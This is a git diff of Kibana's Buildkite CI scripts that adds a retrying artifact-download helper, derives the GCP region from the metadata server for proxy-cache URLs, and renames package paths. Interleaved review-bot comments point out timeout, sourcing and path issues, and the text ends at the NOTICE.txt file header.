diff --git a/.buildkite/agents.json b/.buildkite/agents.json deleted file mode 100644 index 797b7e71f2be6..0000000000000 --- a/.buildkite/agents.json +++ /dev/null @@ -1,79 +0,0 @@ -{ - "gcp": { - "project": "elastic-kibana-ci", - "zones": ["us-central1-a", "us-central1-b", "us-central1-c", "us-central1-f"], - "serviceAccount": "elastic-buildkite-agent@elastic-kibana-ci.iam.gserviceaccount.com", - "imageFamily": "kb-ubuntu", - "subnetwork": "buildkite", - "disableExternalIp": true, - "diskType": "pd-ssd", - "diskSizeGb": 75, - "overprovision": 0, - "minimumAgents": 0, - "maximumAgents": 50, - "gracefulStopAfterMins": 360, - "hardStopAfterMins": 540, - "idleTimeoutMins": 10, - "exitAfterOneJob": false, - - "agents": [ - { - "queue": "default", - "name": "kb-default", - "minimumAgents": 1, - "maximumAgents": 100, - "idleTimeoutMins": 60, - "machineType": "e2-small" - }, - { - "queue": "c2-8", - "name": "kb-c2-8", - "machineType": "c2-standard-8", - "localSsds": 1 - }, - { - "queue": "c2-4", - "name": "kb-c2-4", - "machineType": "c2-standard-4", - "localSsds": 1 - }, - { - "queue": "jest", - "name": "kb-jest", - "machineType": "n2-standard-2", - "diskSizeGb": 128 - }, - { - "queue": "ci-group", - "name": "kb-cigroup", - "machineType": "n2-standard-8", - "diskSizeGb": 256 - }, - { - "queue": "ci-group-4", - "name": "kb-cigroup-4", - "machineType": "n2-standard-4", - "diskSizeGb": 128 - }, - { - "queue": "ci-group-4d", - "name": "kb-cigroup-4d", - "machineType": "n2d-standard-4", - "diskSizeGb": 128 - }, - { - "queue": "ci-group-6", - "name": "kb-cigroup-6", - "machineType": "n2-custom-6-16384", - "diskSizeGb": 128 - }, - { - "queue": "packer", - "name": "kb-packer", - "serviceAccount": "buildkite-packer-agent@elastic-kibana-ci.iam.gserviceaccount.com", - "maximumAgents": 10, - "machineType": "e2-small" - } - ] - } -} 
diff --git a/.buildkite/pipeline-utils/test-failures/annotate.ts b/.buildkite/pipeline-utils/test-failures/annotate.ts
index 8ac896c99434b..8397fa670af66 100644
--- a/.buildkite/pipeline-utils/test-failures/annotate.ts
+++ b/.buildkite/pipeline-utils/test-failures/annotate.ts
@@ -150,7 +150,7 @@ export const annotateTestFailures = async () => {
 }
 exec(
- `buildkite-agent artifact download --include-retried-jobs "target/test_failures/*.json" "${failureDir}"`
+ `.buildkite/scripts/common/download_artifact.sh --include-retried-jobs "target/test_failures/*.json" "${failureDir}"`
 );
 const failures: TestFailure[] = recursiveReadDir(failureDir)
diff --git a/.buildkite/scripts/common/download_artifact.sh b/.buildkite/scripts/common/download_artifact.sh
new file mode 100755
index 0000000000000..09f2d9e978a96
--- /dev/null
+++ b/.buildkite/scripts/common/download_artifact.sh
@@ -0,0 +1,6 @@
+#!/usr/bin/env bash
+
+set -euo pipefail
+
+source "$(dirname "$0")/util.sh"
+download_artifact "$@"
diff --git a/.buildkite/scripts/common/env.sh b/.buildkite/scripts/common/env.sh
index 4be9f7c7fddce..f80acae365d4e 100755
--- a/.buildkite/scripts/common/env.sh
+++ b/.buildkite/scripts/common/env.sh
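Review bot: The replacement command names `.buildkite/scripts/common/download_artifact.sh` as a path relative to the process working directory, whereas the `buildkite-agent` binary it replaces was resolved on PATH, so this `exec` now only works when the helper runs from the repository root and a wrong cwd surfaces as a confusing "not found" rather than a download error. Anchoring the script to the module removes that assumption, e.g. `path.resolve(__dirname, '../../scripts/common/download_artifact.sh')` in place of the bare relative path (importing `path` if the file does not already). A one-line comment is also warranted because the wrapper changes the step's timing budget: `// download_artifact.sh wraps buildkite-agent with a per-attempt timeout and retries`. The body of annotateTestFailures starts before and continues after this hunk.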
@@ -26,10 +26,22 @@ export KIBANA_BASE_BRANCH="$KIBANA_PKG_BRANCH"
 KIBANA_PKG_VERSION="$(jq -r .version "$KIBANA_DIR/package.json")"
 export KIBANA_PKG_VERSION
-export GECKODRIVER_CDNURL="https://us-central1-elastic-kibana-184716.cloudfunctions.net/kibana-ci-proxy-cache"
-export CHROMEDRIVER_CDNURL="https://us-central1-elastic-kibana-184716.cloudfunctions.net/kibana-ci-proxy-cache"
-export RE2_DOWNLOAD_MIRROR="https://us-central1-elastic-kibana-184716.cloudfunctions.net/kibana-ci-proxy-cache"
-export CYPRESS_DOWNLOAD_MIRROR="https://us-central1-elastic-kibana-184716.cloudfunctions.net/kibana-ci-proxy-cache/cypress"
+BUILDKITE_AGENT_GCP_REGION=""
+if [[ "$(curl -is metadata.google.internal || true)" ]]; then
+ # projects/1003139005402/zones/us-central1-a -> us-central1-a -> us-central1
+ BUILDKITE_AGENT_GCP_REGION=$(curl -sH Metadata-Flavor:Google http://metadata.google.internal/computeMetadata/v1/instance/zone | rev | cut -d'/' -f1 | cut -c3- | rev)
+fi
+export BUILDKITE_AGENT_GCP_REGION
+
+CI_PROXY_CACHE_SUFFIX=""
+if [[ "$BUILDKITE_AGENT_GCP_REGION" ]]; then
+ CI_PROXY_CACHE_SUFFIX="/region/$BUILDKITE_AGENT_GCP_REGION"
+fi
+
+export GECKODRIVER_CDNURL="https://us-central1-elastic-kibana-184716.cloudfunctions.net/kibana-ci-proxy-cache$CI_PROXY_CACHE_SUFFIX"
+export CHROMEDRIVER_CDNURL="https://us-central1-elastic-kibana-184716.cloudfunctions.net/kibana-ci-proxy-cache$CI_PROXY_CACHE_SUFFIX"
+export RE2_DOWNLOAD_MIRROR="https://us-central1-elastic-kibana-184716.cloudfunctions.net/kibana-ci-proxy-cache$CI_PROXY_CACHE_SUFFIX"
+export CYPRESS_DOWNLOAD_MIRROR="https://us-central1-elastic-kibana-184716.cloudfunctions.net/kibana-ci-proxy-cache$CI_PROXY_CACHE_SUFFIX/cypress"
 export NODE_OPTIONS="--max-old-space-size=4096"
diff --git a/.buildkite/scripts/common/setup_bazel.sh b/.buildkite/scripts/common/setup_bazel.sh
index 40159ba9eaf69..de381010b8aa3 100755
--- a/.buildkite/scripts/common/setup_bazel.sh
+++ b/.buildkite/scripts/common/setup_bazel.sh
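Review bot: Both `curl` calls that derive BUILDKITE_AGENT_GCP_REGION run without a connect or total timeout, and because env.sh is sourced by every job this probe now sits on the critical path of all of them rather than only the Bazel setup it was moved from, so a slow or black-holed `metadata.google.internal` stalls every step. Adding `--connect-timeout 2 --max-time 5` to both invocations bounds that cost. The result is also interpolated unchecked into the proxy-cache URLs here and, through setup_bazel.sh, into a bucket name, while the probe only checks that something answered at that hostname; a shape check such as `[[ "$BUILDKITE_AGENT_GCP_REGION" =~ ^[a-z0-9-]+$ ]] || BUILDKITE_AGENT_GCP_REGION=""` keeps an unexpected response from producing malformed mirror URLs and falls back cleanly. If the sourcing script runs under `set -e`, a failure of the second curl makes the command-substitution assignment abort the job outright, which is presumably not the intent of the `|| true` on the probe.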
@@ -16,12 +16,7 @@ BAZEL_CACHE_MODE=${BAZEL_CACHE_MODE:-gcs}
 if [[ "$BAZEL_CACHE_MODE" == "gcs" ]]; then
 echo "[bazel] enabling caching with GCS buckets"
- BAZEL_REGION="us-central1"
- if [[ "$(curl -is metadata.google.internal || true)" ]]; then
- # projects/1003139005402/zones/us-central1-a -> us-central1-a -> us-central1
- BAZEL_REGION=$(curl -sH Metadata-Flavor:Google http://metadata.google.internal/computeMetadata/v1/instance/zone | rev | cut -d'/' -f1 | cut -c3- | rev)
- fi
-
+ BAZEL_REGION="${BUILDKITE_AGENT_GCP_REGION:-us-central1}"
 BAZEL_BUCKET="kibana-ci-bazel_$BAZEL_REGION"
 echo "[bazel] using GCS bucket: $BAZEL_BUCKET"
diff --git a/.buildkite/scripts/common/util.sh b/.buildkite/scripts/common/util.sh
index b25ba2c46213f..1ce05856ec6b7 100755
--- a/.buildkite/scripts/common/util.sh
+++ b/.buildkite/scripts/common/util.sh
@@ -168,3 +168,9 @@ npm_install_global() {
 npm install -g "$toInstall" && touch "$successFlag"
 fi
 }
+
+# Download an artifact using the buildkite-agent, takes the same arguments as https://buildkite.com/docs/agent/v3/cli-artifact#downloading-artifacts-usage
+# times-out after 60 seconds and retries up to 3 times
+download_artifact() {
+ retry 3 1 timeout 3m buildkite-agent artifact download "$@"
+}
diff --git a/.buildkite/scripts/download_build_artifacts.sh b/.buildkite/scripts/download_build_artifacts.sh
index 1e7525fff25ea..dd0ae660543a8 100755
--- a/.buildkite/scripts/download_build_artifacts.sh
+++ b/.buildkite/scripts/download_build_artifacts.sh
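Review bot: `BAZEL_REGION="${BUILDKITE_AGENT_GCP_REGION:-us-central1}"` now silently selects the us-central1 bucket whenever env.sh has not been sourced before this script runs, an ordering dependency the inline probe it replaces did not have. A comment on that line would make the fallback read as "not on GCE" rather than "default", e.g. `# BUILDKITE_AGENT_GCP_REGION is exported by common/env.sh; empty means the metadata probe found no GCE instance`. Whether every caller sources env.sh first cannot be verified from this hunk.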
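Review bot: The comment above `download_artifact` says it times out after 60 seconds, but the body uses `timeout 3m`, so the documentation is wrong on the day it lands; change it to `# each attempt is killed after 3 minutes (timeout 3m) and retried up to 3 times via retry`. `retry` is presumably the helper defined earlier in util.sh (outside this hunk), and its second argument `1` is not explained here either. A killed attempt can leave a partially written file at the destination, so the behavior of `buildkite-agent artifact download` when the target already exists should be confirmed before relying on the retry: publish.sh verifies sha512 sums, but download_build_artifacts.sh, cloud.sh and docker_context.sh extract what they fetch directly.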
@@ -2,13 +2,15 @@
 set -euo pipefail
+source "$(dirname "$0")/common/util.sh"
+
 if [[ ! -d "$KIBANA_BUILD_LOCATION/bin" ]]; then
 echo '--- Downloading Distribution and Plugin artifacts'
 cd "$WORKSPACE"
-buildkite-agent artifact download kibana-default.tar.gz . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}"
-buildkite-agent artifact download kibana-default-plugins.tar.gz . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}"
+download_artifact kibana-default.tar.gz . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}"
+download_artifact kibana-default-plugins.tar.gz . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}"
 mkdir -p "$KIBANA_BUILD_LOCATION"
 tar -xzf kibana-default.tar.gz -C "$KIBANA_BUILD_LOCATION" --strip=1
diff --git a/.buildkite/scripts/steps/artifacts/cloud.sh b/.buildkite/scripts/steps/artifacts/cloud.sh
index d2d5785093f1e..5bf2285ab162a 100644
--- a/.buildkite/scripts/steps/artifacts/cloud.sh
+++ b/.buildkite/scripts/steps/artifacts/cloud.sh
@@ -4,12 +4,13 @@ set -euo pipefail
 .buildkite/scripts/bootstrap.sh
+source "$(dirname "$0")/../../common/util.sh"
 source .buildkite/scripts/steps/artifacts/env.sh
 echo "--- Build and publish Cloud image"
 mkdir -p target
-buildkite-agent artifact download "kibana-$FULL_VERSION-linux-x86_64.tar.gz" ./target --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}"
+download_artifact "kibana-$FULL_VERSION-linux-x86_64.tar.gz" ./target --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}"
 node scripts/build \
 --skip-initialize \
diff --git a/.buildkite/scripts/steps/artifacts/docker_context.sh b/.buildkite/scripts/steps/artifacts/docker_context.sh
index 86c4361173a08..c50fb3e0524fd 100755
--- a/.buildkite/scripts/steps/artifacts/docker_context.sh
+++ b/.buildkite/scripts/steps/artifacts/docker_context.sh
@@ -4,6 +4,7 @@ set -euo pipefail
 .buildkite/scripts/bootstrap.sh
+source "$(dirname "$0")/../../common/util.sh"
 source .buildkite/scripts/steps/artifacts/env.sh
 KIBANA_DOCKER_CONTEXT="${KIBANA_DOCKER_CONTEXT:="default"}"
@@ -28,7 +29,7 @@ fi
 tar -xf "target/$DOCKER_CONTEXT_FILE" -C "$DOCKER_BUILD_FOLDER"
 cd $DOCKER_BUILD_FOLDER
-buildkite-agent artifact download "kibana-$FULL_VERSION-linux-x86_64.tar.gz" . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}"
+download_artifact "kibana-$FULL_VERSION-linux-x86_64.tar.gz" . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}"
 echo "--- Build context"
 docker build .
diff --git a/.buildkite/scripts/steps/artifacts/publish.sh b/.buildkite/scripts/steps/artifacts/publish.sh
index ed4cb5ca1d4b9..1caee4a0eb025 100644
--- a/.buildkite/scripts/steps/artifacts/publish.sh
+++ b/.buildkite/scripts/steps/artifacts/publish.sh
@@ -7,8 +7,8 @@ source .buildkite/scripts/steps/artifacts/env.sh
 echo "--- Download and verify artifacts"
 function download {
- buildkite-agent artifact download "$1" . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}"
- buildkite-agent artifact download "$1.sha512.txt" . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}"
+ download_artifact "$1" . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}"
+ download_artifact "$1.sha512.txt" . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}"
 sha512sum -c "$1.sha512.txt"
 rm "$1.sha512.txt"
 }
@@ -40,7 +40,7 @@ download "kibana-$FULL_VERSION-windows-x86_64.zip"
 download "dependencies-$FULL_VERSION.csv"
-cd -
+cd -
 echo "--- Set artifact permissions"
 chmod -R a+r target/*
diff --git a/.buildkite/scripts/steps/cloud/build_and_deploy.sh b/.buildkite/scripts/steps/cloud/build_and_deploy.sh
index 05427de058225..6488eca2c9cd8 100755
--- a/.buildkite/scripts/steps/cloud/build_and_deploy.sh
+++ b/.buildkite/scripts/steps/cloud/build_and_deploy.sh
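Review bot: `download` now calls `download_artifact`, but unlike cloud.sh and docker_context.sh this file receives no `source "$(dirname "$0")/../../common/util.sh"` in the diff; unless publish.sh already sources common/util.sh in lines 1–6 (not visible here), the function is undefined at runtime and the step fails on the first download. The same question applies to the hunks in cloud/build_and_deploy.sh, code_coverage/ftr_configs.sh, code_coverage/ingest.sh, functional/scalability_dataset_extraction.sh and test/ftr_configs.sh, none of which add a source line in this diff. Where util.sh is not already sourced, add the same line next to the existing `source .buildkite/scripts/steps/artifacts/env.sh` (or the equivalent header in each script).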
@@ -14,7 +14,7 @@ ECCTL_LOGS=$(mktemp --suffix ".json")
 echo "--- Download Kibana Distribution"
 mkdir -p ./target
-buildkite-agent artifact download "kibana-$VERSION-linux-x86_64.tar.gz" ./target --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}"
+download_artifact "kibana-$VERSION-linux-x86_64.tar.gz" ./target --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}"
 echo "--- Build Cloud Distribution"
 ELASTICSEARCH_MANIFEST_URL="https://storage.googleapis.com/kibana-ci-es-snapshots-daily/$(jq -r '.version' package.json)/manifest-latest-verified.json"
diff --git a/.buildkite/scripts/steps/code_coverage/ftr_configs.sh b/.buildkite/scripts/steps/code_coverage/ftr_configs.sh
index 1a5eafd2e901f..8aa619651e71e 100755
--- a/.buildkite/scripts/steps/code_coverage/ftr_configs.sh
+++ b/.buildkite/scripts/steps/code_coverage/ftr_configs.sh
@@ -28,7 +28,7 @@ configs="${FTR_CONFIG:-}"
 if [[ "$configs" == "" ]]; then
 echo "--- Downloading ftr test run order"
- buildkite-agent artifact download ftr_run_order.json .
+ download_artifact ftr_run_order.json .
 configs=$(jq -r '.[env.FTR_CONFIG_GROUP_KEY].names[]' ftr_run_order.json)
 fi
diff --git a/.buildkite/scripts/steps/code_coverage/ingest.sh b/.buildkite/scripts/steps/code_coverage/ingest.sh
index 6632009346481..31a24981ce200 100755
--- a/.buildkite/scripts/steps/code_coverage/ingest.sh
+++ b/.buildkite/scripts/steps/code_coverage/ingest.sh
@@ -29,7 +29,7 @@ revolveBuildHashes() {
 }
 collectRan() {
- buildkite-agent artifact download target/ran_files/* .
+ download_artifact target/ran_files/* .
 while read -r x; do
 ran=("${ran[@]}" "$(cat "$x")")
@@ -51,7 +51,7 @@ fetchArtifacts() {
 local xs=("$@")
 for x in "${xs[@]}"; do
- buildkite-agent artifact download "target/kibana-coverage/${x}/*" .
+ download_artifact "target/kibana-coverage/${x}/*" .
 done
 }
diff --git a/.buildkite/scripts/steps/code_coverage/jest_parallel.sh b/.buildkite/scripts/steps/code_coverage/jest_parallel.sh
index fd8ea61f2d220..ec2095b88963c 100755
--- a/.buildkite/scripts/steps/code_coverage/jest_parallel.sh
+++ b/.buildkite/scripts/steps/code_coverage/jest_parallel.sh
@@ -2,6 +2,7 @@
 set -euo pipefail
+source "$(dirname "$0")/../../common/util.sh"
 source .buildkite/scripts/steps/code_coverage/util.sh
 export JOB=$BUILDKITE_PARALLEL_JOB
@@ -18,7 +19,7 @@ fi
 export TEST_TYPE
 echo "--- downloading jest test run order"
-buildkite-agent artifact download jest_run_order.json .
+download_artifact jest_run_order.json .
 configs=$(jq -r 'getpath([env.TEST_TYPE]) | .groups[env.JOB | tonumber].names | .[]' jest_run_order.json)
 echo "--- KIBANA_DIR: $KIBANA_DIR"
diff --git a/.buildkite/scripts/steps/functional/scalability_dataset_extraction.sh b/.buildkite/scripts/steps/functional/scalability_dataset_extraction.sh
index cb17393f5f423..86d067174ba8b 100755
--- a/.buildkite/scripts/steps/functional/scalability_dataset_extraction.sh
+++ b/.buildkite/scripts/steps/functional/scalability_dataset_extraction.sh
@@ -34,8 +34,8 @@ mkdir "${BUILD_ID}"
 tar -czf "${BUILD_ID}/scalability_traces.tar.gz" -C target scalability_traces
 buildkite-agent artifact upload "${BUILD_ID}/scalability_traces.tar.gz"
 # Upload Kibana build, plugins, commit sha and traces to the bucket
-buildkite-agent artifact download kibana-default.tar.gz ./"${BUILD_ID}"
-buildkite-agent artifact download kibana-default-plugins.tar.gz ./"${BUILD_ID}"
+download_artifact kibana-default.tar.gz ./"${BUILD_ID}"
+download_artifact kibana-default-plugins.tar.gz ./"${BUILD_ID}"
 echo "${BUILDKITE_COMMIT}" > "${BUILD_ID}/KIBANA_COMMIT_HASH"
 gsutil -m cp -r "${BUILD_ID}" "${GCS_BUCKET}"
 echo "--- Update reference to the latest CI build"
diff --git a/.buildkite/scripts/steps/package_testing/test.sh b/.buildkite/scripts/steps/package_testing/test.sh
index 5831f0d938b26..4a2b8a52525d6 100755
--- a/.buildkite/scripts/steps/package_testing/test.sh
+++ b/.buildkite/scripts/steps/package_testing/test.sh
@@ -2,6 +2,7 @@
 set -euo pipefail
+source "$(dirname "$0")/../../common/util.sh"
 .buildkite/scripts/bootstrap.sh
 echo "--- Package Testing for $TEST_PACKAGE"
@@ -9,13 +10,13 @@ echo "--- Package Testing for $TEST_PACKAGE"
 mkdir -p target
 cd target
 if [[ "$TEST_PACKAGE" == "deb" ]]; then
- buildkite-agent artifact download 'kibana-*-amd64.deb' . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}"
+ download_artifact 'kibana-*-amd64.deb' . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}"
 KIBANA_IP_ADDRESS="192.168.56.5"
 elif [[ "$TEST_PACKAGE" == "rpm" ]]; then
- buildkite-agent artifact download 'kibana-*-x86_64.rpm' . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}"
+ download_artifact 'kibana-*-x86_64.rpm' . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}"
 KIBANA_IP_ADDRESS="192.168.56.6"
 elif [[ "$TEST_PACKAGE" == "docker" ]]; then
- buildkite-agent artifact download "kibana-$KIBANA_PKG_VERSION*-docker-image.tar.gz" . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}"
+ download_artifact "kibana-$KIBANA_PKG_VERSION*-docker-image.tar.gz" . --build "${KIBANA_BUILD_ID:-$BUILDKITE_BUILD_ID}"
 KIBANA_IP_ADDRESS="192.168.56.7"
 fi
 cd ..
diff --git a/.buildkite/scripts/steps/storybooks/build_and_upload.ts b/.buildkite/scripts/steps/storybooks/build_and_upload.ts
index 4e3ff3c75c576..c91eb6a9b8375 100644
--- a/.buildkite/scripts/steps/storybooks/build_and_upload.ts
+++ b/.buildkite/scripts/steps/storybooks/build_and_upload.ts
@@ -17,6 +17,7 @@ const STORYBOOKS = [
 'ci_composite',
 'cloud',
 'coloring',
+ 'chart_icons',
 'controls',
 'custom_integrations',
 'dashboard_enhanced',
diff --git a/.buildkite/scripts/steps/test/ftr_configs.sh b/.buildkite/scripts/steps/test/ftr_configs.sh
index 52450b30f995c..fca1f78469256 100755
--- a/.buildkite/scripts/steps/test/ftr_configs.sh
+++ b/.buildkite/scripts/steps/test/ftr_configs.sh
@@ -32,7 +32,7 @@ fi
 if [ "$configs" == "" ] && [ "$FTR_CONFIG_GROUP_KEY" != "" ]; then
 echo "--- downloading ftr test run order"
- buildkite-agent artifact download ftr_run_order.json .
+ download_artifact ftr_run_order.json .
 configs=$(jq -r '.[env.FTR_CONFIG_GROUP_KEY].names[]' ftr_run_order.json)
 fi
diff --git a/.buildkite/scripts/steps/test/jest_parallel.sh b/.buildkite/scripts/steps/test/jest_parallel.sh
index 8ca025a3e6516..2c4474abe0b05 100755
--- a/.buildkite/scripts/steps/test/jest_parallel.sh
+++ b/.buildkite/scripts/steps/test/jest_parallel.sh
@@ -2,6 +2,7 @@
 set -euo pipefail
+source "$(dirname "$0")/../../common/util.sh"
 export JOB=${BUILDKITE_PARALLEL_JOB:-0}
 # a jest failure will result in the script returning an exit code of 10
@@ -20,7 +21,7 @@ fi
 export TEST_TYPE
 echo "--- downloading jest test run order"
-buildkite-agent artifact download jest_run_order.json .
+download_artifact jest_run_order.json .
 configs=$(jq -r 'getpath([env.TEST_TYPE]) | .groups[env.JOB | tonumber].names | .[]' jest_run_order.json)
 while read -r config; do
diff --git a/.eslintrc.js b/.eslintrc.js
index eb3488aa5caff..caa408887c499 100644
--- a/.eslintrc.js
+++ b/.eslintrc.js
@@ -72,7 +72,7 @@ const ELASTIC_LICENSE_HEADER = `
 const SAFER_LODASH_SET_HEADER = `
 /*
 * Elasticsearch B.V licenses this file to you under the MIT License.
- * See \`packages/elastic-safer-lodash-set/LICENSE\` for more information.
+ * See \`packages/kbn-safer-lodash-set/LICENSE\` for more information.
 */
 `;
@@ -81,7 +81,7 @@ const SAFER_LODASH_SET_LODASH_HEADER = `
 * This file is forked from the lodash project (https://lodash.com/),
 * and may include modifications made by Elasticsearch B.V.
 * Elasticsearch B.V. licenses this file to you under the MIT License.
- * See \`packages/elastic-safer-lodash-set/LICENSE\` for more information.
+ * See \`packages/kbn-safer-lodash-set/LICENSE\` for more information.
 */
 `;
@@ -90,7 +90,7 @@ const SAFER_LODASH_SET_DEFINITELYTYPED_HEADER = `
 * This file is forked from the DefinitelyTyped project (https://github.com/DefinitelyTyped/DefinitelyTyped),
 * and may include modifications made by Elasticsearch B.V.
 * Elasticsearch B.V. licenses this file to you under the MIT License.
- * See \`packages/elastic-safer-lodash-set/LICENSE\` for more information.
+ * See \`packages/kbn-safer-lodash-set/LICENSE\` for more information.
 */
 `;
@@ -186,44 +186,44 @@ const RESTRICTED_IMPORTS = [ { name: 'lodash', importNames: ['set', 'setWith'], - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash.set', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash.setwith', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash/set', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash/setWith', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash/fp', importNames: ['set', 'setWith', 'assoc', 'assocPath'], - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash/fp/set', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash/fp/setWith', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash/fp/assoc', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash/fp/assocPath', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash', @@ -409,7 +409,7 @@ module.exports = { * safer-lodash-set package requires special license headers */ { - files: ['packages/elastic-safer-lodash-set/**/*.{js,mjs,ts,tsx}'], + files: ['packages/kbn-safer-lodash-set/**/*.{js,mjs,ts,tsx}'], rules: { '@kbn/eslint/require-license-header': [ 'error', 
@@ -438,7 +438,7 @@ module.exports = { }, { - files: ['packages/elastic-safer-lodash-set/test/*.{js,mjs,ts,tsx}'], + files: ['packages/kbn-safer-lodash-set/test/*.{js,mjs,ts,tsx}'], rules: { '@kbn/eslint/require-license-header': [ 'error', @@ -466,7 +466,7 @@ module.exports = { }, }, { - files: ['packages/elastic-safer-lodash-set/**/*.d.ts'], + files: ['packages/kbn-safer-lodash-set/**/*.d.ts'], rules: { '@kbn/eslint/require-license-header': [ 'error', @@ -734,7 +734,7 @@ module.exports = { * Harden specific rules */ { - files: ['test/harden/*.js', 'packages/elastic-safer-lodash-set/test/*.js'], + files: ['test/harden/*.js', 'packages/kbn-safer-lodash-set/test/*.js'], rules: { 'mocha/handle-done-callback': 'off', }, @@ -754,11 +754,11 @@ module.exports = { paths: [ { name: 'lodash.set', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash.setwith', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash.template', @@ -767,11 +767,11 @@ module.exports = { }, { name: 'lodash/set', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash/setWith', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { name: 'lodash/template', @@ -786,12 +786,12 @@ module.exports = { { object: 'lodash', property: 'set', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { object: '_', property: 'set', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { object: 'lodash', 
@@ -808,32 +808,32 @@ module.exports = { { object: 'lodash', property: 'setWith', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { object: '_', property: 'setWith', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { object: 'lodash', property: 'assoc', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { object: '_', property: 'assoc', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { object: 'lodash', property: 'assocPath', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, { object: '_', property: 'assocPath', - message: 'Please use @elastic/safer-lodash-set instead', + message: 'Please use @kbn/safer-lodash-set instead', }, ], }, diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS index 09484706c05e0..1b158709e73df 100644 --- a/.github/CODEOWNERS +++ b/.github/CODEOWNERS @@ -136,7 +136,7 @@ x-pack/plugins/files @elastic/kibana-app-services /src/apm.js @elastic/kibana-core @vigneshshanmugam /packages/kbn-apm-config-loader/ @elastic/kibana-core @vigneshshanmugam /src/core/types/elasticsearch @elastic/apm-ui -/packages/elastic-apm-synthtrace/ @elastic/apm-ui +/packages/kbn-apm-synthtrace/ @elastic/apm-ui /packages/kbn-shared-svg @elastic/apm-ui #CC# /src/plugins/apm_oss/ @elastic/apm-ui #CC# /x-pack/plugins/observability/ @elastic/apm-ui 
@@ -597,10 +597,10 @@ x-pack/plugins/security_solution/cypress/README.md @elastic/security-engineering x-pack/test/security_solution_cypress @elastic/security-engineering-productivity ## Security Solution sub teams - adaptive-workload-protection -x-pack/plugins/kubernetes_security @elastic/awp-platform -x-pack/plugins/session_view @elastic/awp-platform -x-pack/plugins/security_solution/public/common/components/sessions_viewer @elastic/awp-platform -x-pack/plugins/security_solution/public/kubernetes @elastic/awp-platform +x-pack/plugins/kubernetes_security @elastic/awp-viz +x-pack/plugins/session_view @elastic/awp-viz +x-pack/plugins/security_solution/public/common/components/sessions_viewer @elastic/awp-viz +x-pack/plugins/security_solution/public/kubernetes @elastic/awp-viz ## Security Solution sub teams - Protections Experience x-pack/plugins/threat_intelligence @elastic/protections-experience @@ -669,7 +669,6 @@ x-pack/test/threat_intelligence_cypress @elastic/protections-experience # Application Experience ## Shared UX Team -/src/plugins/shared_ux/ @elastic/shared-ux /packages/shared-ux/ @elastic/shared-ux /packages/shared-ux-*/ @elastic/shared-ux diff --git a/.i18nrc.json b/.i18nrc.json index cee83a60c1fd2..28986568d5bf3 100644 --- a/.i18nrc.json +++ b/.i18nrc.json @@ -67,8 +67,6 @@ "savedObjectsManagement": "src/plugins/saved_objects_management", "server": "src/legacy/server", "share": "src/plugins/share", - "sharedUX": "src/plugins/shared_ux", - "sharedUXComponents": "packages/kbn-shared-ux-components/src", "sharedUXPackages": "packages/shared-ux", "coloring": "packages/kbn-coloring/src", "statusPage": "src/legacy/core_plugins/status_page", diff --git a/NOTICE.txt b/NOTICE.txt index b150cf5673b42..cb1205f317655 100644 --- a/NOTICE.txt +++ b/NOTICE.txt 
